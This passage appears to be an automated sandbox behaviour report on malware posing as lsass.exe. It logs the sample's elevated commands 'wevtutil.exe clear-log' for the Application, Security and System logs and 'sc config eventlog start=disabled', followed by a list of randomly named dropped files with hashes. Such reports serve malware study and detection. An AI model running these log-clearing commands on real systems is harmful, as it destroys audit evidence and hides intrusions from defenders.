| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76c4a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76c53b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76c34a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76c4a79d |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:27 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 121914 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17942548168 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #35: wevtutil.exe
0
0
| Information | Value |
|---|---|
| ID | #35 |
| File Name | c:\windows\syswow64\wevtutil.exe |
| Command Line | wevtutil.exe clear-log Application |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:59, Reason: Child Process |
| Unmonitor | End Time: 00:01:00, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x90c |
| Parent PID | 0x974 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
904
0x
914
|
Process #36: cmd.exe
61
0
| Information | Value |
|---|---|
| ID | #36 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Security |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:59, Reason: Child Process |
| Unmonitor | End Time: 00:01:00, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x920 |
| Parent PID | 0xaf4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
930
|
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Get Info | wevtutil.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\wevtutil.exe | os_pid = 0x950, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a7b0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76c4a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76c53b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76c34a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76c4a79d |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:28 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 122273 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17994549391 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #37: wevtutil.exe
0
0
| Information | Value |
|---|---|
| ID | #37 |
| File Name | c:\windows\syswow64\wevtutil.exe |
| Command Line | wevtutil.exe clear-log Security |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:59, Reason: Child Process |
| Unmonitor | End Time: 00:01:00, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x950 |
| Parent PID | 0x920 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
94C
0x
948
|
Process #38: cmd.exe
61
0
| Information | Value |
|---|---|
| ID | #38 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log System |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:59, Reason: Child Process |
| Unmonitor | End Time: 00:01:01, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x940 |
| Parent PID | 0xaf4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
998
|
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Get Info | wevtutil.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\wevtutil.exe | os_pid = 0x9a4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a680000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76c4a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76c53b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76c34a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76c4a79d |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:28 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 122538 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18020787685 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #39: wevtutil.exe
0
0
| Information | Value |
|---|---|
| ID | #39 |
| File Name | c:\windows\syswow64\wevtutil.exe |
| Command Line | wevtutil.exe clear-log System |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:59, Reason: Child Process |
| Unmonitor | End Time: 00:01:00, Reason: Self Terminated |
| Monitor Duration | 00:00:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9a4 |
| Parent PID | 0x940 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
33C
0x
9A8
|
Process #40: cmd.exe
60
0
| Information | Value |
|---|---|
| ID | #40 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C sc config eventlog start=disabled |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:00, Reason: Child Process |
| Unmonitor | End Time: 00:01:01, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9ac |
| Parent PID | 0xaf4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9C8
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\sc.exe | os_pid = 0x99c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4ac40000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76c4a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76c53b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76c34a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76c4a79d |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:28 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 122788 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18047215431 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000667 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #41: sc.exe
8
0
| Information | Value |
|---|---|
| ID | #41 |
| File Name | c:\windows\syswow64\sc.exe |
| Command Line | sc config eventlog start=disabled |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:00, Reason: Child Process |
| Unmonitor | End Time: 00:01:01, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x99c |
| Parent PID | 0x9ac (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9C4
0x
A04
|
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 649 |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\sc.exe | base_address = 0x4c0000 |
|
1 |
Service (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:28 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 122866 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18061811062 |
|
1 |
Process #44: lsass.exe
44738
2
| Information | Value |
|---|---|
| ID | #44 |
| File Name | c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe |
| Command Line | "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe" * |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:26, Reason: Autostart |
| Unmonitor | End Time: 00:04:26, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:59 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x538 |
| Parent PID | 0x454 (Unknown) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
53C
0x
5B0
0x
6B0
0x
6D8
0x
6DC
0x
6E0
0x
6E4
0x
364
0x
35C
0x
5E8
0x
65C
0x
6F0
0x
62C
0x
630
0x
318
0x
5C4
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| lsass.exe | 0x00C00000 | 0x00C32FFF | Relevant Image | - | 32-bit | - |
|
|
|
Dropped Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\-0WGp.flv | 32.46 KB |
MD5:
9dce7b9a28c1c64e7d3e6e8c9ff3df96
SHA1: 37636f1c75294e0a699be51228e00a624f0d3700 SHA256: e5a1ec9a51eba54654b4a51d10fc56fa08fe1406ccd3f426a738086e2f06b406 SSDeep: 768:yEQanwqgopdfpNmu0l3pyjhy9LhO0TMznRDYaT5GpZaerLCa1J5Ye:9wFopMpy1yVQJYa1+ZaerLCa1J5t |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\7ipS.ods | 51.47 KB |
MD5:
94256fd818b5a6f41ac519f0f2894652
SHA1: 1ff083554db9c73a8afd0202724f2a4b20385059 SHA256: 41068ceef652412bf64c6d261f18fd806a38441f457a7625d87ae11ba9e61ce0 SSDeep: 1536:abjP00dUKIQPxTFG494BDF5Ku+2s7X+CJE2:0dVzxTFG496B5K8Ec2 |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\9ElWv1el4-AEdsTzk.wav | 41.85 KB |
MD5:
daf2220f70b4e7a71c8789252b744f77
SHA1: bc3ac72f09bde995a6535c09975f5ce7689bbbf5 SHA256: 24be3c6f4bfe6d0be349b94b1b560053412722f7ff56661f491385b21b004774 SSDeep: 768:pJlhb2Q7qa3cqaJ2sit/SVeyLR1ufhGvRfXWfmINLyayUFGOVmSgABe:pDhzFcqC2sX8qR1ufhSGtN+aPFnVi/ |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Cj5z8Sw9v7O.ods | 78.36 KB |
MD5:
30c07d6eb846b11e11cb0f4cb42bd143
SHA1: 4b803651328559b7224ad6d97426f90611bf983c SHA256: aff3f505c3f14793113012e317bb801b0cbdee10aa1af413f1128cf6399c47c8 SSDeep: 1536:1LvD+LzH5J2ctaK3klFNGsJQiqN+w0cLceOW3aItLBKDPPPxX3YqY6Fj1:1mLzH5uGlLB93NLIDPhoqYqj1 |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\c_qKiZxj_.avi | 89.17 KB |
MD5:
dcc6ed2f0a60a444e4f55f7c5008693b
SHA1: bfce038289c7dd4771fcca97afe798fa7ba11038 SHA256: 085761749eaa27e4a69d7ca2eedfe02d2180b04b6036eed8e88df4d0bafbb34a SSDeep: 1536:QIQ86+MmqQpDpN+ImkeeeWT2X5aj+/FgABvFYrYFMlOtojq222ij0lcBrGPR5uXQ:Q4VTpKILeeetX5ajjABNpFQs44gu9iX/ |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Et7K.png | 30.05 KB |
MD5:
5410b0a5611a9dc9cb905cee5cdc6b7b
SHA1: 456e166e12d4e0fbc8bb7d0aaf29b0000d1f3d87 SHA256: b9b65505a64d221abb2675ecc1cf9c83526a82f9895e55ca86db6867496f617b SSDeep: 768:4YOmpP9EtvxEFb6WPjd3eQeyikCdcxsNnNje:EQ9svxEFb6wwfTQs1Na |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Fe3xoXvZ.m4a | 36.67 KB |
MD5:
a458d0c719a2f2e6443c2e67a73cff5a
